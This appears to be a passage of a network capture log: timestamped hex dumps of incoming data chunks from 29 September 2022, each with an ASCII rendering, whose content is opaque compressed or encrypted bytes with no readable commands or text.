                                                                                                        2022-09-29 12:46:21 UTC10692INData Raw: 9c dc 0b ed a3 e5 7b 8d 09 f8 52 2a 46 23 6b e2 74 b6 46 7b dc 16 97 27 f3 de f8 f4 10 1f d8 c9 ac a7 7d dc 4d 60 13 7f 68 a8 1b fd 58 f0 e9 4d e4 a0 a0 86 be 66 3d b5 41 0b 85 ff 63 eb cb db 34 68 cb 31 3b dc ce 14 59 d1 bf 86 95 72 e2 94 b9 b8 8c 6b f3 c9 be 72 35 90 d5 8b b3 34 e9 b2 c9 ea db 1f 35 a6 80 15 03 72 5f 38 4f 0f 09 db 1b 2a 3e 72 d3 f2 c4 9c 22 2d d1 69 7f 75 41 b3 97 8f 4e 0a 2a d4 5f 5e be 3c 09 3e 44 7e ff 16 53 f6 1f f5 95 d5 4b 19 69 30 fd 88 d8 1d db c6 15 cc 38 df 47 08 dd 0d 71 9f 80 32 8e 34 86 c9 0e 96 19 c9 d5 25 d4 30 ab d7 d1 23 b3 6e fa 21 7b bc 1b 16 5c bb 40 72 3c 3a 1d 23 73 35 76 f8 04 1d 5f f7 01 05 6b 76 32 ad bb 7d 42 f2 33 bb 19 44 8b ef eb 5d 99 ee 08 67 04 d9 22 fa 91 3d b3 bb 11 fb 52 ad 03 ce 1f b4 7e 8e a8 31 48
                                                                                                        Data Ascii: {R*F#ktF{'}M`hXMf=Ac4h1;Yrkr545r_8O*>r"-iuAN*_^<>D~SKi08Gq24%0#n!{\@r<:#s5v_kv2}B3D]g"=R~1H
                                                                                                        2022-09-29 12:46:21 UTC10708INData Raw: 3c ff 78 6b 2a 5b 88 88 e1 04 ba c9 89 dd 9b 08 af 7b af d7 62 e5 f8 27 4b 23 31 d3 6f f0 7d a3 db 51 ee 9b ca f8 21 9e 02 f1 ec a5 7a 1e 15 6c da 3a a7 a7 36 59 1c ea 4e f1 f7 90 d5 ea fe 4c 74 b5 59 b2 a3 c3 d6 96 63 b3 73 60 89 26 9f 3f 5e aa 7a af 5a 33 4c a1 aa 2f 02 bd 1a 70 91 55 2c d1 7f 8f f1 f9 5c 4c 19 54 03 39 38 dc 6c ea 86 7a d8 b1 6d 43 f6 05 3b ac 60 c1 43 1b 2c c2 ce ac 9a a8 75 bf 2b 2e a8 1a b4 d8 63 32 2e c7 8e d0 e4 a4 59 a7 16 ab a6 3c 3a 16 32 34 c3 ff e6 a7 4b cd 73 dc 53 92 7c 9d af 2f d6 f2 5a cc ae c7 5d 1b bf b3 2c da c9 cb 11 75 d7 17 8f 5a f5 0a 61 31 37 ca ef 86 15 19 43 32 d1 55 b3 e8 88 b1 0d fb 7a db 27 47 6b 88 03 96 b2 a2 85 9c 26 f1 40 55 3a 30 cf 72 eb a1 35 55 19 cf d0 08 85 33 91 31 15 bd 76 35 38 2c b8 4f b2 23 c9
                                                                                                        Data Ascii: <xk*[{b'K#1o}Q!zl:6YNLtYcs`&?^zZ3L/pU,\LT98lzmC;`C,u+.c2.Y<:24KsS|/Z],uZa17C2Uz'Gk&@U:0r5U31v58,O#
                                                                                                        2022-09-29 12:46:21 UTC10724INData Raw: 7b c8 e0 7e 35 c2 f7 33 c7 b4 93 72 22 f0 75 df ab de 29 db c9 34 61 20 b1 2e 5a f5 92 a0 66 92 3a e9 88 16 eb 29 8d cc 04 d6 4f 71 53 d8 f9 38 5b 76 a8 96 4e b6 4d 8f bc 01 e1 43 c5 33 50 27 d7 86 67 60 ea bf 2a 31 6c af f6 72 ae 18 f0 30 b7 bd ad d0 ac 90 37 b4 ef 78 fe 3f 9f e1 ba 8b 50 e9 f3 aa 59 8e a0 19 2d ba ce 34 8b 39 3a a4 cc 52 70 d4 0e d1 3a 88 f5 be 81 67 f3 3c 19 d3 7e 62 4b ac 19 f4 18 38 54 71 5c 14 1b 61 7d de 15 19 5c 75 17 c2 d1 c1 5f e9 a3 05 82 60 7c 28 e8 af c1 66 0b a3 db d8 ed 32 d9 37 c9 b3 90 74 62 26 4b c5 07 67 c6 5e 85 f3 d0 98 09 a7 a4 5c 3d 37 54 1e 77 93 dd 2e 68 2a bf 14 3b 65 65 a2 91 92 2b a4 6b d9 92 82 7f d7 aa 4e 46 3e 95 35 38 1c af 5a a6 38 2b 99 fa 26 95 be 8e a4 83 05 19 8b e6 dc 69 0f 0a c3 13 dd 00 a6 3a b1 b0
                                                                                                        Data Ascii: {~53r"u)4a .Zf:)OqS8[vNMC3P'g`*1lr07x?PY-49:Rp:g<~bK8Tq\a}\u_`|(f27tb&Kg^\=7Tw.h*;ee+kNF>58Z8+&i:
                                                                                                        2022-09-29 12:46:21 UTC10733INData Raw: 0d 39 18 3e ff b5 c7 fc 5f 15 4f 24 63 88 3a bf b4 d1 b6 ff 59 f3 b9 d2 a6 14 2b 3a 63 01 24 81 86 58 df 91 cc 64 ed 6f e3 6f 84 e1 b1 1f 11 10 88 2a 03 0e ab ee 03 78 97 1d fd d8 e1 e7 0b 3c 1b a3 72 07 ba 44 7e c2 8b 5c fd 89 14 6d 53 b1 40 c3 5f f7 04 e9 3e b5 9f dc 3c 30 66 ae 28 34 59 f3 69 f8 ff 83 1c 41 df 11 47 17 1e 03 6b 42 ef c9 a9 c3 ce 24 21 dd c8 e6 11 38 37 bd d5 bc 1e cb 98 a6 65 bf a1 9a f1 e0 5e 6f 16 22 ee e7 08 5c 19 63 e0 9c 22 f2 fa 21 e4 47 81 2f a8 09 eb 15 a5 5c e9 c5 9c 79 da b5 fe 1b 1c b1 bd 1f 11 b2 ad 89 f4 41 eb a1 e0 3a 1f 4e d3 23 91 85 c7 b8 d9 c3 56 67 a0 b3 22 2d 4a a7 27 d8 1c f2 13 9f c2 6b 8e 75 cd 36 b7 46 c9 99 60 3a 69 c6 ca 01 35 01 aa 84 3c 9e 74 44 45 80 00 e2 fa 3c f4 b1 19 37 c1 32 ae 5c 41 32 4c 4f bb c7 4d
                                                                                                        Data Ascii: 9>_O$c:Y+:c$Xdoo*x<rD~\mS@_><0f(4YiAGkB$!87e^o"\c"!G/\yA:N#Vg"-J'ku6F`:i5<tDE<72\A2LOM
                                                                                                        2022-09-29 12:46:21 UTC10749INData Raw: 08 f1 d8 2c c6 ca fb 82 f5 2a 7a aa 51 31 c6 e8 be a9 b8 bf d4 a1 b5 80 96 39 18 df b5 df 2f ac ec 08 2e 6d 03 20 83 92 20 5c 1a 2e 5c 42 32 72 5a 9a 05 d1 f0 61 ed 3d fd ea 0b 8f 7a d8 48 d2 29 56 b5 9f f2 38 5d 03 2f 1d 36 e7 bf 30 0b 6d 27 52 cf cd 87 40 76 e2 cd 04 4c 5a f0 cb b5 9e cc 66 6c f4 fc 48 43 83 e2 0d 85 68 7a 40 bb 14 06 fa ee dd 71 ad 7e 48 b2 34 cb fd 43 92 19 67 d4 8f e0 08 36 b5 da 15 7d ab 37 c2 06 7f f0 ce 89 ae e4 e9 23 7c 97 5d 88 99 e4 33 e3 19 4c 12 9b 0c f3 0a 7e 2c 1c d8 c0 2f 13 93 25 3a 23 ea 74 37 a8 22 4b 22 1f ec 3d 0f cd 2f 4a c9 70 07 59 e5 4c 42 72 ce e7 e6 c7 f6 c3 1b 68 aa 36 06 47 8b a7 49 6d c8 05 0c 03 fe 10 ac 7a 67 da 0b df 59 a8 e7 5d 1e 21 0a 08 1f 93 38 f7 01 00 40 e5 07 d3 2e 16 e5 20 1f ea f1 1f 12 94 96 34
                                                                                                        Data Ascii: ,*zQ19/.m \.\B2rZa=zH)V8]/60m'R@vLZflHChz@q~H4Cg6}7#|]3L~,/%:#t7"K"=/JpYLBrh6GImzgY]!8@. 4
                                                                                                        2022-09-29 12:46:21 UTC10765INData Raw: f2 55 5b 50 68 ca 65 74 64 f1 0e fa c1 f1 be e4 65 9e e2 26 17 54 f3 a7 53 df 41 e4 57 94 45 7a e0 92 e2 49 20 54 08 88 29 41 54 96 75 4c 92 03 31 ad 40 cb 3f 9d 55 31 2e 76 d8 65 84 b8 7a fd 82 9d 0c 60 b2 ad 1d 5b 97 b0 4e d7 c7 9e 60 34 d1 21 96 93 c6 8d 42 64 09 43 e5 d1 21 a7 3f ec 5a f8 24 12 1a 1f ed 1c df f6 df ff 9b 00 71 ea d6 e5 88 f8 df a9 18 60 9c 72 4f 9c b3 4b d3 53 be 05 0b 85 3c 9c d7 86 94 53 59 cc 20 98 fc f1 12 04 db 5f 74 31 32 8a 13 11 46 fb 6b 1e a8 26 f1 16 f4 7d e0 1c 1a 0b f8 42 97 c2 43 3f 9c b2 e7 91 c2 d9 c5 63 21 7a a0 d1 37 ce f0 98 7f d0 05 90 6f b3 5c fe b9 b2 a1 e6 cb 44 0f cb 53 5d 29 84 38 cf 0e af 2a d1 20 57 98 80 75 6e 16 e0 81 45 ee c1 1e 11 cb e2 3d 76 27 b6 73 37 4d 96 6a a9 05 2e 95 ed 57 1d 18 6f 01 16 16 34 33
                                                                                                        Data Ascii: U[Phetde&TSAWEzI T)ATuL1@?U1.vez`[N`4!BdC!?Z$q`rOKS<SY _t12Fk&}BC?c!z7o\DS])8* WunE=v's7Mj.Wo43
                                                                                                        2022-09-29 12:46:21 UTC10781INData Raw: 32 16 0f 7c ff 34 85 a5 c7 24 3f ea 79 35 b9 00 e4 25 df 10 e9 d1 b7 9a 7c c2 51 15 6f fc 63 9a d0 ce 69 96 b0 4e 99 41 15 3b b0 d9 b5 4a c8 9c 70 9c 67 1e 08 c5 0a 35 76 ad b1 73 3f 3a 5e 50 7a 2b 5f 32 d1 3d d8 d2 a5 4c 82 d8 0e 8b 5f 63 26 08 e6 56 0a 36 f2 34 cc a0 bf a2 a6 7e 93 81 78 47 9f 8d 90 fd 3f 10 ec ae 18 e9 33 bf 6f 45 ec 00 63 5b 64 92 eb c7 1a 4f 35 a6 bd 7b f8 62 4c aa a1 61 2d 68 22 4a 56 04 2d 34 e9 36 84 4f 99 35 b7 a2 5d f3 e4 0e 20 40 ff c0 a0 8a 12 79 01 51 02 a8 1a e4 94 dd db b3 4c ff c8 0c f7 b8 35 7f ee 54 63 7b cf 8f 7c 04 58 d4 02 1c 3b 67 d3 7a d6 4c e7 19 08 7a 34 c1 29 00 c9 aa 0e eb 28 62 b2 0d 83 8f a9 20 4d c4 fe 2d e7 c0 4c 45 1c 44 ba e3 ca 0a 39 1b c3 d8 26 34 77 fb 72 58 71 37 86 33 56 26 d2 d3 08 df 0b 96 36 df 14
                                                                                                        Data Ascii: 2|4$?y5%|QociNA;Jpg5vs?:^Pz+_2=L_c&V64~xG?3oEc[dO5{bLa-h"JV-46O5] @yQL5Tc{|X;gzLz4)(b M-LED9&4wrXq73V&6
                                                                                                        2022-09-29 12:46:21 UTC10797INData Raw: cc 4b 3f c8 23 1d cd de 94 86 c4 48 46 02 3d d3 11 05 c1 7c b9 e7 84 e0 b2 45 84 55 f9 e5 7b 22 ab ae 8b 1e 8d 5c 4d e5 75 77 e3 84 0b f9 cf c3 23 00 28 6b 5c 35 04 82 0f 80 4d 7e 12 24 b6 22 ff 15 04 af d3 cf 6f 8b b1 ed bc 0b 78 ad 83 62 14 07 03 8d a7 cc ed c8 f4 cc 97 03 33 8a cb 0b 02 cb 57 38 8b 2a 10 ed 9e dc b8 48 67 95 8f b7 0f 87 8b f3 9c da 41 5b 4c 26 fd c7 73 6b 2a ff 21 4b 89 d2 0e 33 95 3a da be 66 be 55 22 0a f5 4a ea 8a 8f 74 38 af 2d 57 9e 86 58 a9 40 d3 ac 93 ce 40 b3 aa 39 ce d1 a3 ed 8c 1a d2 f7 a1 64 83 68 2b da ec de 34 e2 6d a1 2c e6 7a 16 37 c9 49 f6 2e 77 d4 77 33 cc 8b 62 5e 6b 81 50 ba 87 c2 43 0c 9d f7 6e 9f f1 20 9d 96 9e 65 45 fc 51 cb 8f 3c 90 a8 d0 24 07 f1 3c a4 08 54 c7 e0 9d e2 ae fc 5f 13 71 21 9b 91 41 50 16 9f 2c d9
                                                                                                        Data Ascii: K?#HF=|EU{"\Muw#(k\5M~$"oxb3W8*HgA[L&sk*!K3:fU"Jt8-WX@@9dh+4m,z7I.ww3b^kPCn eEQ<$<T_q!AP,
                                                                                                        2022-09-29 12:46:21 UTC10813INData Raw: b8 21 3d e8 45 04 87 54 df 5c b8 aa d4 74 77 84 66 20 24 f6 69 9e df 9b 27 d4 04 24 71 30 68 e9 52 d2 79 07 c1 24 43 e0 c2 df 6a c2 13 00 dd 35 e2 5e 46 31 fc 44 72 1b d5 96 c7 2a 4d a3 9b 57 7d 2c 05 39 e8 b5 49 54 b8 01 e6 b2 a3 0d f4 a1 c0 be f6 3f 37 01 a5 b3 3a af ed 69 55 28 a4 9f 6e fd c9 77 da 22 86 9f 8d 8d 2e 5a c7 b7 48 09 96 70 99 87 75 36 60 d0 9f ed f9 24 0a 38 31 b9 5e 08 9b cd d6 6d 7f 7e 3f 61 90 3a fb 5c cc 37 8c 17 bb 51 95 30 7d bb 9f 3f 19 8f 61 a4 ea f1 f3 56 9e eb a7 37 11 f6 1b 59 f3 95 32 54 a6 49 cc 0d 9e d9 7a 8a aa d8 ed bc f3 2d f2 52 0a a9 d0 50 2d 21 89 00 91 25 2b b0 65 8f b1 50 82 ab a3 92 3c 16 2a d6 7e 33 06 ae 5f b7 78 71 d9 18 7b 2c 09 f7 3c 44 26 d3 3c f2 42 79 d4 6c cc 24 1d 18 2a 45 73 4d 56 63 10 d6 6a 4d eb dc a9
                                                                                                        Data Ascii: !=ET\twf $i'$q0hRy$Cj5^F1Dr*MW},9IT?7:iU(nw".ZHpu6`$81^m~?a:\7Q0}?aV7Y2TIz-RP-!%+eP<*~3_xq{,<D&<Byl$*EsMVcjM
                                                                                                        2022-09-29 12:46:21 UTC10829INData Raw: c6 1a d0 3e d9 6a c1 0b c7 84 9c 0c 89 29 18 48 0b 58 6c 59 d5 27 bd 4f aa 79 e3 69 dc dd 91 79 32 2d e7 af 60 f7 d5 4a 73 82 6a f1 d0 9f 67 65 5e 37 84 96 d0 87 38 16 eb af f5 ab 94 0e ef b2 f1 6c 0e 1c 15 c9 aa 5d b1 66 02 34 0e 73 1f cc 98 12 6e b2 86 31 45 b6 5f 00 6d b1 87 f6 5e bf d4 00 5e db 63 ab 62 cc a1 b8 7a 2f 1c 1d 4f b3 65 d4 aa ed 0a 35 bc 06 e6 64 39 0a 26 23 72 c1 23 a5 01 85 c5 f4 40 f5 21 88 09 30 c9 e5 9d 33 a6 66 d4 e7 7d d2 23 49 1c f3 4e 41 f2 d0 85 25 4f 53 08 6b 04 7d 28 d4 8a 43 d9 b3 9f 7e 95 a3 03 1b 4c 8f 48 30 21 b4 a3 64 2a 06 5e 24 b0 8d d2 62 d0 02 bb 13 e2 64 23 3d be 8d e2 55 4e bb d9 c2 93 30 fc 78 75 82 21 11 42 83 bf 09 77 83 f2 4a aa ba 60 de 2e 25 d5 4d 75 66 fc 85 f5 3e 75 65 89 f9 ac 60 71 79 2d 79 32 c1 5e dc 76
                                                                                                        Data Ascii: >j)HXlY'Oyiy2-`Jsjge^78l]f4sn1E_m^^cbz/Oe5d9&#r#@!03f}#INA%OSk}(C~LH0!d*^$bd#=UN0xu!BwJ`.%Muf>ue`qy-y2^v
                                                                                                        2022-09-29 12:46:21 UTC10845INData Raw: 7e 29 53 f9 df 58 fd d0 48 f2 95 28 07 a4 86 df 98 a1 31 60 e4 f4 f0 be 58 cc 13 4b bb 0d c4 97 42 6e 62 fa 7b 86 06 fe dc 93 c6 b1 ec e5 8e 52 39 e9 c0 22 5a 70 df 19 3e 1f 51 15 a5 f0 27 bb 82 fd d6 00 15 d7 56 41 e2 8e 1f f6 e9 25 2f 15 07 12 01 21 17 5a 44 51 f7 7d 38 ad f4 a3 e5 ac 5a 1f 5b bf 96 19 4e c9 fc dc ee ae 3c fb 39 14 97 cb 0e 62 73 b8 15 48 36 dd f6 4e 37 42 cf 9e 79 32 8a 95 3b d1 94 91 ef 48 73 d2 71 1c 21 02 45 42 5d e9 1a 3e ed a6 3c 2d 66 5d f7 cf d2 7b 55 12 bd 6d 64 fe 2c 6d 16 92 07 b1 e9 34 24 91 42 6c 35 a2 6d 29 b4 4e b5 0e 98 e3 02 d0 ee bb 52 16 96 03 cb 7d ad 26 be 49 bd a2 c6 d6 7e 3c 57 a8 e3 b7 2e f1 64 a0 1b 00 8b 03 17 f2 94 6d 9c 15 1f 6c 38 d5 e1 47 6d 1c 76 a6 9b bd 54 0d 30 e7 b0 89 98 c6 dd e4 07 a4 9f 39 af a3 57
                                                                                                        Data Ascii: ~)SXH(1`XKBnb{R9"Zp>Q'VA%/!ZDQ}8Z[N<9bsH6N7By2;Hsq!EB]><-f]{Umd,m4$Bl5m)NR}&I~<W.dml8GmvT09W
                                                                                                        2022-09-29 12:46:21 UTC10861INData Raw: cb af 47 66 0f 5a 91 07 5f 36 55 14 42 40 40 c8 e1 da 5e 06 08 bc dc e7 a0 60 5b 5d fe 9d 1d 56 34 55 b3 eb ec 31 ee 30 31 df c9 35 c0 e4 89 d8 d3 e0 10 33 d5 a2 31 1e d4 5f ee bd 0a 2e 4f 00 b2 47 b1 2d e1 16 15 b1 46 21 1d 33 6a 05 0b 0b 87 2a b2 cb ce f9 90 27 9d ec dd 65 f0 4d aa 4b a1 55 95 d0 1e 5d fa 7d 7f d3 8d 4b 4b 5f 18 46 ac af af f1 db 7a fb b1 32 5a e7 3a d6 cc 06 27 f5 a1 78 e7 81 d5 7b 44 24 da 3a 85 12 a1 8c ea 00 c7 be c8 04 d6 c0 ee 9e 26 2c 20 27 f8 c4 d8 cf eb 0a 1c 13 ef 35 cf 21 01 1c 33 9c af 6f 39 2e d6 6d 53 cd b5 96 ab cf 2f d2 65 08 fe c6 d8 f0 d9 98 cd 09 4d 07 7a 9b 3d 11 28 98 0c 15 f3 b0 fa 77 f0 4d 3e ce cb ef b3 af a2 51 40 d6 1a ee a9 47 8b 34 ee 55 48 13 cc bb 8e 58 ff b0 ff 75 9c b9 b5 91 d8 e2 ae 0f 90 8c a4 46 d9 eb
                                                                                                        Data Ascii: GfZ_6UB@@^`[]V4U101531_.OG-F!3j*'eMKU]}KK_Fz2Z:'x{D$:&, '5!3o9.mS/eMz=(wM>Q@G4UHXuF
                                                                                                        2022-09-29 12:46:21 UTC10877INData Raw: 2f f0 49 45 28 02 8c 61 fa 37 31 48 2c 96 24 f8 1c 59 23 51 a5 f9 5e 4a 94 d8 ef 7e e0 ab f4 f5 56 d8 67 5d 00 8a 23 b7 53 dc 59 41 df 43 28 46 c6 73 30 c3 f2 f7 6c 94 9e 0b 30 45 83 0f 87 35 6c b9 67 17 70 c0 42 2f 1e 84 d6 55 6b e4 53 03 99 fc 38 88 41 0c ee b2 6d ef c5 cf f9 b7 ea 5d b6 81 df a8 ba ea ed 27 35 02 a8 47 69 dc 1b 5f 66 0a 6a 17 03 5f a3 ed be ce c2 b4 57 9f bd 32 df d1 73 85 42 5a f2 2d 9a b8 36 c4 43 d9 f5 cd aa e1 b2 1f df 68 8e 10 c5 7f 55 57 da b3 a0 82 a3 0c 16 ac b2 6b 37 5a 5b 3a 3e 60 5d 6a fc c1 21 a3 83 59 6c 89 0b 80 7b 63 d5 44 28 61 16 59 f1 17 7e a4 b4 dc 86 13 80 b0 f3 bc 7e 0c aa 0e ba c1 50 43 75 29 37 c5 9d d8 d8 bb f2 d3 d4 f5 fc 76 b4 a2 72 16 8e ad 57 ad 66 20 66 dc 9c 32 85 c7 ff b9 d5 4e ef 99 b8 c2 0e 3b 8c 4d d1
                                                                                                        Data Ascii: /IE(a71H,$Y#Q^J~Vg]#SYAC(Fs0l0E5lgpB/UkS8Am]'5Gi_fj_W2sBZ-6ChUWk7Z[:>`]j!Yl{cD(aY~~PCu)7vrWf f2N;M
                                                                                                        2022-09-29 12:46:21 UTC10893INData Raw: 48 62 0d f6 c4 ac a7 b3 56 3f e9 02 cb 27 4d 39 18 20 55 73 68 95 b6 46 4b 40 0b 6e 18 0f ac 8a 48 60 47 a5 93 ea 07 95 bc 10 3c 92 17 d0 cf 89 0a f0 38 ce ef 3b 4a a0 f6 36 14 f6 7f 46 00 9f 58 80 cb c4 95 55 b8 06 76 51 80 c8 77 cf 9e 70 12 39 73 7d db a8 4f c7 94 21 ea c8 7b 4e b3 5a 09 83 5b 28 e1 7f 11 23 15 c1 fd 2d 9e 7f 96 15 9b 45 fa 10 cc 19 df 35 f0 b5 df cf c9 4c b5 51 da e6 07 09 ae 47 f2 a3 a6 13 87 1e e4 55 86 3f e3 47 e0 7e a6 e7 4e 29 10 d6 58 fb 39 f3 d4 db 32 9d 3f c3 ae b6 c9 5e b1 66 c8 1e 12 4e 73 91 a7 a3 d9 d9 47 60 f3 64 e8 26 6c b0 13 57 ef 3c d0 01 13 7b 71 5a 3a 2a c4 71 a7 6c 85 fb a8 6d 79 08 23 2d 23 0e cc 28 56 f1 cd eb ff d8 e8 2a cc f8 73 80 01 a3 39 52 e4 93 72 c9 8c b5 9f 85 dd e2 26 c9 f8 0c e2 b7 1d 07 c7 5c 01 67 a3
                                                                                                        Data Ascii: HbV?'M9 UshFK@nH`G<8;J6FXUvQwp9s}O!{NZ[(#-E5LQGU?G~N)X92?^fNsG`d&lW<{qZ:*qlmy#-#(V*s9Rr&\g
                                                                                                        2022-09-29 12:46:21 UTC10909INData Raw: 8c a2 38 4b d3 c4 2a b5 ea fc c9 24 a7 22 b7 d8 22 a7 e3 01 01 56 4b cb 62 55 a3 20 44 fe 47 fc f6 64 57 4e fb bc 82 bb e5 64 3d 88 ba 89 d9 7f 18 28 47 07 c6 19 ae a5 f8 bb c9 56 df 98 df 49 09 51 48 c1 e0 6a 1d 67 02 77 1e 1d 84 93 ef 48 f1 ab ee 6d 13 e7 1f 99 12 c5 60 99 8e 21 ab 81 7e b2 cf 8e 2d f9 44 5c 66 3a 5a 81 5d be a3 e7 dc 5a 81 3f 28 4f 84 5e cf 88 bd e8 29 40 14 97 7a bc 35 47 b7 d2 9a 20 d6 52 0d c2 0d ff 4a cb f2 9d 6c 40 fe 5b cf eb 75 a8 53 43 33 23 13 cf 0b 9b 24 09 f3 56 0f 27 00 de f4 92 8e 3a 36 a2 16 b9 f0 96 4e 93 65 cd 99 29 6a 80 75 a0 3c d8 cb 8a 27 67 c3 ea 49 59 d4 07 ae 93 4c 70 f8 2a 7c ca 72 89 05 86 10 d4 b9 5e 80 26 39 03 ae d5 b4 3b 20 bd 59 46 8a 4a 04 27 18 37 ed 33 b9 b0 ba 8a 2f e8 be b3 33 ae da 89 c7 65 df ef b5
                                                                                                        Data Ascii: 8K*$""VKbU DGdWNd=(GVIQHjgwHm`!~-D\f:Z]Z?(O^)@z5G RJl@[uSC3#$V':6Ne)ju<'gIYLp*|r^&9; YFJ'73/3e
                                                                                                        2022-09-29 12:46:21 UTC10925INData Raw: 31 31 c7 af 6f 42 bd d4 6e ee a5 86 2c a9 7e 90 8f f3 62 a2 3a fd f4 d2 27 c1 9b 9c be 03 79 13 da ea d1 ee f9 af f7 fc 58 56 c6 e2 1b 13 68 4a f8 14 21 af da 60 b5 df 5e 2f 46 cd 61 74 5b f6 62 3a c4 ab 2b 2b 54 1b 90 ba 69 ba 3a 60 cd 6f 03 5f 50 47 17 37 b9 54 16 c4 e9 18 5d 87 71 a9 d4 1a 82 53 06 06 7e 05 1d 2d f2 bc 6e d9 37 87 af 08 aa ac e0 09 5d c5 6f 8a ff 00 ef 6c f5 34 ee 92 32 20 fe ef db bb 14 5d b8 ec 72 19 8e f6 50 48 32 02 97 93 15 cf 1c eb f4 71 b8 4d 94 3c ba ae cf 26 4a d6 f0 a5 07 f3 ca c6 e9 bf 88 5f 89 b2 e2 61 90 1a 15 02 6c 6a 7c 63 ac ec c2 d8 af db 52 3a 6f 81 73 53 5e de d3 31 5f 04 53 ef e7 aa 00 f2 1c 7f bc fb 96 8e 2c 93 b5 d9 e5 d6 61 cd a8 02 97 2b 39 1a 04 31 19 18 57 a6 c0 22 1f 20 88 1d ff e2 ac 41 59 81 e2 2c fe 3e 60
                                                                                                        Data Ascii: 11oBn,~b:'yXVhJ!`^/Fat[b:++Ti:`o_PG7T]qS~-n7]ol42 ]rPH2qM<&J_alj|cR:osS^1_S,a+91W" AY,>`
                                                                                                        2022-09-29 12:46:21 UTC10941INData Raw: 44 d0 5a eb e3 de c0 66 eb 4d 82 a2 60 7a cf ec f8 9c ab fc eb be 5d 02 ca 47 d5 92 35 96 5a af a7 02 41 91 22 2c 4b 84 25 d9 28 69 55 fb d8 12 25 ad fd 34 b5 12 e2 b5 64 99 5f 76 4f 79 e3 36 4a 8c ac bc c1 72 a8 68 f2 40 fe f2 83 7e 04 1a 0e 13 01 4d a5 e2 9f 6c 8b 76 89 fa 5a c5 8d 96 b8 07 17 c7 c6 32 6a 22 c8 25 67 b7 6b ac 89 d9 68 6d 10 bb 56 74 fd fd d8 77 91 7c 25 bb 27 70 19 8c e3 69 05 12 22 54 0b 0e 91 62 a9 e9 f3 b9 eb 90 b7 5c 82 1b 07 f3 06 8a 3d 53 80 36 2c 3d ab 6f e7 72 23 99 4c 83 11 28 bd 4d c8 a6 db 05 11 d8 c3 31 ee c1 9f 3d 7e 4b 2f 93 e8 cf 39 74 f2 c7 3d d2 c2 b7 75 bf d0 25 3b b3 04 60 b7 ec b0 15 75 0f 64 0c 2a b8 1c 8e 90 f3 cf 47 a4 5e 2c dd c1 81 b7 f2 3c 93 e5 c3 a0 e9 ef 3c f4 19 47 93 ec 23 97 c7 d6 39 43 77 eb 84 cd c6 ac
                                                                                                        Data Ascii: DZfM`z]G5ZA",K%(iU%4d_vOy6Jrh@~MlvZ2j"%gkhmVtw|%'pi"Tb\=S6,=or#L(M1=~K/9t=u%;`ud*G^,<<G#9Cw
                                                                                                        2022-09-29 12:46:21 UTC10957INData Raw: a6 32 eb 35 87 b8 45 75 7d 72 23 95 ec 6b 4d 0c 05 cc 09 5c ec ce 41 ae de 8b d6 8a f9 04 13 b9 c2 ae 6c 6c f8 6e a5 b6 0c 08 f1 32 83 f4 b3 6a 7e 7a 19 1e 68 18 0c dc 02 6f 32 4d 88 8b b9 bf bd dd 96 8d f1 b2 5e f2 e7 cd 83 e4 13 1d 93 bc f9 68 d2 80 06 77 3f b0 5a 7e 6a f1 9c 1f 86 f8 26 ad 9e f3 a7 9b b8 fb 21 d3 4d 1c 59 24 64 81 d8 d6 02 9f 89 40 4c 2e c5 75 f0 23 d4 cb e5 37 c1 46 85 00 59 23 d1 89 62 46 9a 66 5b 04 35 a5 8f b2 90 e7 0f 57 0c 28 42 4f 7f e1 c0 33 c7 ae 62 3d b3 f2 da d4 f3 4f 53 93 bb 61 8f f3 8b 0d c5 68 a7 a1 96 0f 93 05 d9 2d f8 3b 42 1c 9d 70 9d fe 3f 68 bc 8d 2b f0 c3 8d e2 6b fb 70 f5 8d d8 d5 0b 07 51 fe 92 38 84 72 a8 6e 88 59 fc da 2c 73 60 6d bf 12 1f e0 82 f5 14 15 ea 77 cc 55 2f dd 51 35 b4 ed e6 a0 94 ac ec a5 6e e1 a4
                                                                                                        Data Ascii: 25Eu}r#kM\Alln2j~zho2M^hw?Z~j&!MY$d@L.u#7FY#bFf[5W(BO3b=OSah-;Bp?h+kpQ8rnY,s`mwU/Q5n
                                                                                                        2022-09-29 12:46:21 UTC10973INData Raw: d1 55 53 3c e4 53 b6 88 ef 9f 83 c1 d6 fd fb 18 41 5b 7f 9d 25 8a 90 50 a1 7a 92 f7 3e 6a 69 fa ba e5 3f fa da 7a ba c9 2c 3b be ee 74 db c3 e7 f5 85 4f 83 26 0b 19 9f b4 11 65 da f1 3d bd e3 c5 b4 05 13 51 1c 20 81 58 c6 26 b1 34 3c 95 1d 3b 17 ee 7c ba 44 de 25 8e c4 3d 96 98 58 d4 55 94 21 55 f1 05 c2 10 72 36 ce d4 a3 33 2f b8 f1 12 fb 77 40 6e 5f b7 c7 9e c9 17 b7 4a b0 b4 18 17 12 6e e0 68 01 0c a5 5e 8e 5b 21 76 f5 72 e3 c5 de a3 50 f5 00 b2 ce 5f 49 08 7d 70 d2 2d 87 ef 09 a2 77 3a 0b dd 1b d6 86 b1 4a 50 68 62 0e c0 7e 23 a5 96 1e be 74 50 7f 28 a1 47 1f 54 1d 08 80 14 40 34 cf ed 2c bd c1 e7 63 33 20 6b 94 dd 82 82 cf b8 bf 44 e8 3c c9 ff 4b 34 65 93 81 4e bf 64 04 c2 de c7 fe d5 a9 fc d2 3b 5e 3d 33 f5 06 73 53 d0 32 d0 2f dd 4d 2f 12 3e 26 bb
                                                                                                        Data Ascii: US<SA[%Pz>ji?z,;tO&e=Q X&4<;|D%=XU!Ur63/w@n_Jnh^[!vrP_I}p-w:JPhb~#tP(GT@4,c3 kD<K4eNd;^=3sS2/M/>&
                                                                                                        2022-09-29 12:46:21 UTC10989INData Raw: e9 18 41 66 d0 5b bf ef 77 c6 88 70 39 0e 01 e4 2f 47 4d a2 84 72 c9 7f 76 93 e8 06 77 bb 30 1f c3 bb 50 56 2d 08 54 08 d4 d8 56 d0 56 d6 97 45 23 c3 d6 7e 28 b6 a6 bb de c5 f2 90 72 c9 47 d0 4f 04 f4 7c 9f 4a 54 6a 62 f1 e3 7a cc c1 97 d7 22 56 29 9e 94 ad a1 52 1d 2c 65 6f a8 40 6b f7 69 26 e7 07 a4 60 c8 5c da 55 7d 4b 0c 8b c7 30 c0 de 0d a9 c3 68 14 0b c0 61 96 20 50 87 ae 35 db 4d 09 99 f2 ae b7 84 94 57 e1 98 5e e6 39 84 7e 23 34 ad ce ee c2 39 61 8b 66 97 e0 d0 50 57 8b 4c 4c 15 c0 86 23 53 b3 b2 b3 65 1a 52 ec f3 bc 5f e8 85 14 ce 3a 94 70 2d 41 5d 85 51 97 02 59 96 91 5b d5 c0 cf 9d b4 1b 35 b1 a5 a9 cc 